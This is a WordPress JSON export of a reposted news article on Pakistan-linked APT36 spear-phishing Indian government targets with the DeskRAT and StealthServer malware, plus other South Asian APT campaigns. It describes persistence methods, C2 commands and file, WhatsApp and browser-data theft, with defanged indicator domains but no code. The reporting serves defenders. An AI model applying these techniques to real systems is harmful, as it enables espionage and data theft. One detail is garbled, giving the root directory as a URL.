{"id":30974,"date":"2025-10-27T00:55:55","date_gmt":"2025-10-27T00:55:55","guid":{"rendered":"https:\/\/fusionmindlabs.com\/blogs\/apt36-hits-india-with-golang-malware\/"},"modified":"2025-10-27T00:55:58","modified_gmt":"2025-10-27T00:55:58","slug":"apt36-hits-india-with-golang-malware","status":"publish","type":"post","link":"https:\/\/fusionmindlabs.com\/blogs\/apt36-hits-india-with-golang-malware\/","title":{"rendered":"APT36 Hits India with Golang Malware"},"content":{"rendered":"[ad_1]\n<\/p>\n<div>\n<p><span class=\"p-author\"><i class=\"icon-font icon-calendar\"><\/i><span class=\"author\">Oct 24, 2025<\/span><i class=\"icon-font icon-user\"><\/i><span class=\"author\">Ravie Lakshmanan<\/span><\/span><span class=\"p-tags\">Cyber Espionage \/ Malware<\/span><\/p>\n<\/div>\n<div id=\"articlebody\">\n<div class=\"separator\" style=\"clear: both;\">\n<a href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhQlLDV9eHmX0UxtlV_GgmAOIgKuN8Ko4GLu13DsbfOsmXOvZCCfJFJYTu4bWeUaVoNQdQvqwitjs9X6gMRTAMc_42zGhH59sINyGokJo-7HwggyEP6v0NqKmiLlMHl2WDVoclCkkDXEAsE-ZN3Yz1ADcLXPV5vRtrIKTP07e87JvUg72soCwq2BwffNjbD\/s790-rw-e365\/indian-cyberattack.jpg\" style=\"clear: left; display: block; float: left;  text-align: center;\" rel=\"nofollow noopener\" target=\"_blank\"><\/p>\n<p><\/a>\n<\/div>\n<p>A threat actor with ties to Pakistan has been identified as targeting Indian government entities through spear-phishing attacks, with the ultimate goal of delivering a Golang-based malware known as <strong>DeskRAT<\/strong>.<\/p>\n<p>The activity, <a href=\"https:\/\/blog.sekoia.io\/transparenttribe-targets-indian-military-organisations-with-deskrat\/\" rel=\"noopener nofollow\" target=\"_blank\">observed<\/a> in August and September 2025 by Sekoia, has been attributed to <a href=\"https:\/\/www.seqrite.com\/blog\/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india\/\" rel=\"noopener nofollow\" target=\"_blank\">Transparent Tribe<\/a> (also known as APT36), a state-sponsored hacking group that has been active since at least 2013. This campaign builds upon a prior one <a href=\"https:\/\/thehackernews.com\/2025\/08\/transparent-tribe-targets-indian-govt.html\" rel=\"noopener nofollow\" target=\"_blank\">disclosed<\/a> by CYFIRMA in August 2025.<\/p>\n<p>The attack chains involve sending phishing emails that contain a ZIP file attachment or a link to an archive hosted on legitimate cloud services like Google Drive. The ZIP file contains a malicious Desktop file that embeds commands to display a decoy PDF (&#8220;CDS_Directive_Armed_Forces.pdf&#8221;) using Mozilla Firefox, while simultaneously executing the main payload.<\/p>\n<p>Both the artifacts are pulled from an external server &#8220;modgovindia[.]com&#8221; and executed. The campaign is designed to target BOSS (Bharat Operating System Solutions) Linux systems, with the remote access trojan capable of establishing command-and-control (C2) using WebSockets.<\/p>\n<p>The malware supports four different methods for persistence, including creating a systemd service, setting up a cron job, adding the malware to the Linux autostart directory (&#8220;$HOME\/.config\/autostart&#8221;), and configuring.bashrc to launch the trojan by means of a shell script written to the &#8220;$HOME\/.config\/system-backup\/&#8221; directory.<\/p>\n<div class=\"dog_two clear\"><center class=\"cf\"><a href=\"https:\/\/thehackernews.uk\/cloud-insight-d\" rel=\"nofollow noopener sponsored\" target=\"_blank\"><img fetchpriority=\"high\" decoding=\"async\" class=\"lazyload\" alt=\"DFIR Retainer Services\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjzU4HTrkySm0XtyBVGRYE0rh0Fu057BcqLPyQ1DkQue9iJF64vs2nAMMK_e93VgilDx3SGrwBOcUItR7l3WC46QCzJJznACknx0e3BkN5Hl5oW0T4adCH97EPaL2urebcGd8Ijj4t5a_FDHSrZnYEneLlQN4pORoNzFAHU2_kDDHlrOV7iMsKTIrcI3nWB\/s728-rw-e100\/cloud-insight-d.png\" width=\"729\" height=\"91\"\/><\/a><\/center><\/div>\n<p>DeskRAT supports five different commands &#8211;<\/p>\n<ul>\n<li><strong>ping<\/strong>, to send a JSON message with the current timestamp, along with &#8220;pong&#8221; to the C2 server<\/li>\n<li><strong>heartbeat<\/strong>, to send a JSON message containing heartbeat_response and a timestamp<\/li>\n<li><strong>browse_files<\/strong>, to send directory listings<\/li>\n<li><strong>start_collection<\/strong>, to search and send files matching a predefined set of extensions and which are below 100 MB in size<\/li>\n<li><strong>upload_execute<\/strong>, to drop an additional Python, shell, or desktop payload and execute it<\/li>\n<\/ul>\n<p>&#8220;DeskRAT&#8217;s C2 servers are named as stealth servers,&#8221; the French cybersecurity company said. &#8220;In this context, a stealth server refers to a name server that does not appear in any publicly visible NS records for the associated domain.&#8221;<\/p>\n<p>&#8220;While the initial campaigns leveraged legitimate cloud storage platforms such as Google Drive to distribute malicious payloads, TransparentTribe has now transitioned to using dedicated staging servers.&#8221;<\/p>\n<p><a name=\"more\"\/><\/p>\n<p>The findings follow a report from QiAnXin XLab, which <a href=\"https:\/\/blog.xlab.qianxin.com\/apt-stealthserver-en\/\" rel=\"noopener nofollow\" target=\"_blank\">detailed<\/a> the campaign&#8217;s targeting of Windows endpoints with a Golang backdoor it tracks as StealthServer through phishing emails containing booby-trapped Desktop file attachments, suggesting a cross-platform focus.<\/p>\n<p>It&#8217;s worth noting that StealthServer for Windows comes in three variants &#8211;<\/p>\n<ul>\n<li><strong>StealthServer Windows-V1<\/strong> (Observed in July 2025), which employs several anti-analysis and anti-debug techniques to avoid detection; establishes persistence using scheduled tasks, a PowerShell script added to the Windows Startup folder, and Windows Registry changes; and uses TCP to communicate with the C2 server in order to enumerate files and upload\/download specific files<\/li>\n<li><strong>StealthServer Windows-V2<\/strong> (Observed in late August 2025), which adds new anti\u2011debug checks for tools like OllyDbg, x64dbg, and IDA, while keeping the functionality intact<\/li>\n<li><strong>StealthServer Windows-V3<\/strong> (Observed in late August 2025), which uses WebSocket for communication and has the same functionality as DeskRAT<\/li>\n<\/ul>\n<p>XLab said it also observed two Linux variants of StealthServer, one of which is DeskRAT with support for an extra command called &#8220;welcome.&#8221; The second Linux version, on the other hand, uses HTTP for C2 communications instead of WebSocket. It features three commands &#8211;<\/p>\n<ul>\n<li><strong>browse<\/strong>, to enumerate files under a specified directory<\/li>\n<li><strong>upload<\/strong>, to upload a specified file<\/li>\n<li><strong>execute<\/strong>, to execute a bash command<\/li>\n<\/ul>\n<p>It also recursively searches for files matching a set of extensions right from the root directory (&#8220;https:\/\/thehackernews.com\/&#8221;) and then transmits them as it encounters them in an encrypted format via a HTTP POST request to &#8220;modgovindia[.]space:4000.&#8221; This indicates the Linux variant could have been an earlier iteration of DeskRAT, since the latter features a dedicated &#8220;start_collection&#8221; command to exfiltrate files.<\/p>\n<div class=\"separator\" style=\"clear: both;\"><a href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhvp49_0xvXhcOVzGvyhJruZ71GEcN9U6jza3QIZ1f4jtEs4U5IduXY6pep-PwqSusrwk5YHKTdA5Xx5KjiE-6OOlUWOquGREnf0nQCGzQiMxACCVG0cJC9831ORGDapX2dVmurO3fCEFUCnhBPmGKspByXHMgxpruChsBtTjCVf_YeIriwiShO7pBeZgE9\/s790-rw-e365\/deskrat.png\" style=\"clear: left; display: block; float: left;  text-align: center;\" rel=\"nofollow noopener\" target=\"_blank\"><img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhvp49_0xvXhcOVzGvyhJruZ71GEcN9U6jza3QIZ1f4jtEs4U5IduXY6pep-PwqSusrwk5YHKTdA5Xx5KjiE-6OOlUWOquGREnf0nQCGzQiMxACCVG0cJC9831ORGDapX2dVmurO3fCEFUCnhBPmGKspByXHMgxpruChsBtTjCVf_YeIriwiShO7pBeZgE9\/s790-rw-e365\/deskrat.png\" alt=\"\" border=\"0\" data-original-height=\"1616\" data-original-width=\"2048\"\/><\/a><\/div>\n<p>&#8220;The group&#8217;s operations are frequent and characterized by a wide variety of tools, numerous variants, and a high delivery cadence,&#8221; QiAnXin XLab said.<\/p>\n<h2 style=\"text-align: left;\">Attacks from Other South and East Asian Threat Clusters<\/h2>\n<p>Recent weeks have seen the discovery of various campaigns orchestrated by South Asia-focused threat actors &#8211;<\/p>\n<ul>\n<li>A <a href=\"https:\/\/ti.qianxin.com\/blog\/articles\/bitter-uses-diverse-means-to-deliver-new-backdoor-components-en\/\" rel=\"noopener nofollow\" target=\"_blank\">phishing campaign<\/a> undertaken by <a href=\"https:\/\/thehackernews.com\/2025\/06\/bitter-hacker-group-expands-cyber.html\" rel=\"noopener nofollow\" target=\"_blank\">Bitter APT<\/a> targeting government, electric power, and military sectors in China and Pakistan with malicious Microsoft Excel attachments or RAR archives that exploit <a href=\"https:\/\/thehackernews.com\/2025\/08\/winrar-zero-day-under-active.html\" rel=\"noopener nofollow\" target=\"_blank\">CVE-2025-8088<\/a> to ultimately drop a C# implant named &#8220;cayote.log&#8221; that can gather system information and run arbitrary executables received from an attacker-controlled server.<\/li>\n<li>A <a href=\"https:\/\/hunt.io\/blog\/operation-southnet-sidewinder-south-asia-maritime-phishing\" rel=\"noopener nofollow\" target=\"_blank\">new wave of targeted activity<\/a> undertaken by <a href=\"https:\/\/thehackernews.com\/2025\/05\/south-asian-ministries-hit-by.html\" rel=\"noopener nofollow\" target=\"_blank\">SideWinder<\/a> <a href=\"https:\/\/hunt.io\/blog\/apt-sidewinder-netlify-government-phishing\" rel=\"noopener nofollow\" target=\"_blank\">targeting<\/a> the maritime sector and other verticals in Pakistan, Sri Lanka, Bangladesh, Nepal, and Myanmar with credential-harvesting portals and weaponized lure documents that deliver multi-platform malware as part of a &#8220;concentrated&#8221; campaign codenamed Operation SouthNet.<\/li>\n<li>An <a href=\"https:\/\/mp.weixin.qq.com\/s\/rW_xSgKlV6r0_JXIjr97Rg\" rel=\"noopener nofollow\" target=\"_blank\">attack<\/a> <a href=\"https:\/\/mp.weixin.qq.com\/s?__biz=MzUyMjk4NzExMA==&amp;mid=2247507399&amp;idx=1&amp;sn=01bd1443bd6fd0c238014d2246c34039&amp;chksm=f9c1eececeb667d81092f39b7b62807e1617b4629ce3364e427c6112f4300a932a2739a33e58&amp;scene=178&amp;cur_album_id=1955835290309230595&amp;search_click_id=#rd\" rel=\"noopener nofollow\" target=\"_blank\">campaign<\/a> undertaken by a Vietnam-aligned hacking group known as <a href=\"https:\/\/thehackernews.com\/2024\/08\/vietnamese-human-rights-group-targeted.html\" rel=\"noopener nofollow\" target=\"_blank\">OceanLotus<\/a> (aka APT-Q-31) that delivers the <a href=\"https:\/\/thehackernews.com\/2023\/02\/threat-actors-adopt-havoc-framework-for.html\" rel=\"noopener nofollow\" target=\"_blank\">Havoc<\/a> post-exploitation framework in attacks targeting enterprises and government departments in China and neighboring Southeast Asian countries.<\/li>\n<li>An <a href=\"https:\/\/securelist.com\/mysterious-elephant-apt-ttps-and-tools\/117596\/\" rel=\"noopener nofollow\" target=\"_blank\">attack campaign<\/a> undertaken by <a href=\"https:\/\/thehackernews.com\/2024\/11\/apt-k-47-uses-hajj-themed-lures-to.html\" rel=\"noopener nofollow\" target=\"_blank\">Mysterious Elephant<\/a> (aka APT-K-47) in early 2025 that uses a combination of exploit kits, phishing emails, and malicious documents to gain initial access to target government entities and foreign affairs sectors in Pakistan, Afghanistan, Bangladesh, Nepal, India, and Sri Lanka using a PowerShell script that drops BabShell (a C++ reverse shell), which then launches MemLoader HidenDesk (a loader that executes a Remcos RAT payload in memory) and MemLoader Edge (another malicious loader that embeds VRat, a variant of the open-source RAT vxRat).<\/li>\n<\/ul>\n<div class=\"dog_two clear\"><center class=\"cf\"><a href=\"https:\/\/thehackernews.uk\/platform-shield-d\" rel=\"nofollow noopener sponsored\" target=\"_blank\"><img decoding=\"async\" class=\"lazyload\" alt=\"CIS Build Kits\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg6GpYnSEVgX-9xu8f-VEj7xbwYz7E6zxE6xL0Mfd6tE2wQ213wwvT8vkv9eqwMuEfEQllm8YJQUQglXFcA0kr6LlEYLvq7Lskyu5defaNo2Xq02wIg4tsGvkRuvj2DsW6rc3rfqDiqjQ3PolYAj0VqrBW2E7d70thPArHjR2RGL_UIVsJS0H_kmMOqjk9t\/s728-rw-e100\/cis-d.png\" width=\"729\" height=\"91\"\/><\/a><\/center><\/div>\n<p>Notably, these intrusions have also focused on exfiltrating WhatsApp communications from compromised hosts using a number of modules \u2013 viz., Uplo Exfiltrator and Stom Exfiltrator \u2013 that are devoted to capturing various files exchanged through the popular messaging platform.<\/p>\n<p>Another tool used by the threat actor is ChromeStealer Exfiltrator, which, as the name implies, is capable of harvesting cookies, tokens, and other sensitive information from Google Chrome, as well as siphon files related to WhatsApp.<\/p>\n<p>The disclosure paints a picture of a hacking group that has evolved beyond relying on tools from other threat actors into a sophisticated threat operation, wielding its own arsenal of custom malware. The adversary is known to share tactical overlaps with <a href=\"https:\/\/thehackernews.com\/2025\/07\/donot-apt-expands-operations-targets.html\" rel=\"noopener nofollow\" target=\"_blank\">Origami Elephant<\/a>, <a href=\"https:\/\/thehackernews.com\/2025\/10\/confucius-hackers-hit-pakistan-with-new.html\" rel=\"noopener nofollow\" target=\"_blank\">Confucius<\/a>, and SideWinder, all of which are assessed to be operating with Indian interests in mind.<\/p>\n<p>&#8220;Mysterious Elephant is a highly sophisticated and active Advanced Persistent Threat group that poses a significant threat to government entities and foreign affairs sectors in the Asia-Pacific region,&#8221; Kaspesky said. &#8220;The use of custom-made and open-source tools, such as BabShell and MemLoader, highlights their technical expertise and willingness to invest in developing advanced malware.&#8221;<\/p>\n<\/div>\n[ad_2]\n<br \/><a href=\"https:\/\/thehackernews.com\/2025\/10\/apt36-targets-indian-government-with.html\" rel=\"nofollow noopener\" target=\"_blank\">Source Link<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[ad_1] Oct 24, 2025Ravie LakshmananCyber Espionage \/ Malware A threat actor with ties to Pakistan has been identified as targeting Indian government entities through spear-phishing attacks, with the ultimate goal&#8230;<\/p>\n","protected":false},"author":19,"featured_media":30975,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22],"tags":[46,39,32,31,33,34,35,40,36,37,42,44,43,41,38,45],"class_list":{"0":"post-30974","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-cybersecurity","8":"tag-computer-security","9":"tag-cyber-attacks","10":"tag-cyber-news","11":"tag-cyber-security-news","12":"tag-cyber-security-news-today","13":"tag-cyber-security-updates","14":"tag-cyber-updates","15":"tag-data-breach","16":"tag-hacker-news","17":"tag-hacking-news","18":"tag-how-to-hack","19":"tag-information-security","20":"tag-network-security","21":"tag-ransomware-malware","22":"tag-software-vulnerability","23":"tag-the-hacker-news"},"jetpack_featured_media_url":"https:\/\/fusionmindlabs.com\/blogs\/wp-content\/uploads\/sites\/9\/2025\/10\/indian-cyberattack.jpg","_links":{"self":[{"href":"https:\/\/fusionmindlabs.com\/blogs\/wp-json\/wp\/v2\/posts\/30974","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fusionmindlabs.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fusionmindlabs.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fusionmindlabs.com\/blogs\/wp-json\/wp\/v2\/users\/19"}],"replies":[{"embeddable":true,"href":"https:\/\/fusionmindlabs.com\/blogs\/wp-json\/wp\/v2\/comments?post=30974"}],"version-history":[{"count":1,"href":"https:\/\/fusionmindlabs.com\/blogs\/wp-json\/wp\/v2\/posts\/30974\/revisions"}],"predecessor-version":[{"id":30976,"href":"https:\/\/fusionmindlabs.com\/blogs\/wp-json\/wp\/v2\/posts\/30974\/revisions\/30976"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fusionmindlabs.com\/blogs\/wp-json\/wp\/v2\/media\/30975"}],"wp:attachment":[{"href":"https:\/\/fusionmindlabs.com\/blogs\/wp-json\/wp\/v2\/media?parent=30974"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fusionmindlabs.com\/blogs\/wp-json\/wp\/v2\/categories?post=30974"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fusionmindlabs.com\/blogs\/wp-json\/wp\/v2\/tags?post=30974"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}